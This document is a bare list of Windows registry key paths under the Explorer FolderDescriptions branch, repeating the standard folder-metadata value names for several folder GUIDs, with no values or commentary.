HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C870044B-F49E-4126-A9C3-B52A1FF411E8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{C5ABBF53-E17F-4121-8900-86626FC2C973}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{56784854-C6CB-462B-8169-88E350ACB882}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{7B396E54-9EC5-4300-BE0A-2482EBAE1A26}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{BCBD3057-CA5C-4622-B42D-BC56DB0AE516}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{A302545D-DEFF-464B-ABE8-61C8648D939B}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\explorer\FolderDescriptions\{2B0F765D-C0E9-4171-908E-08A611B84FF6}\PreCreate
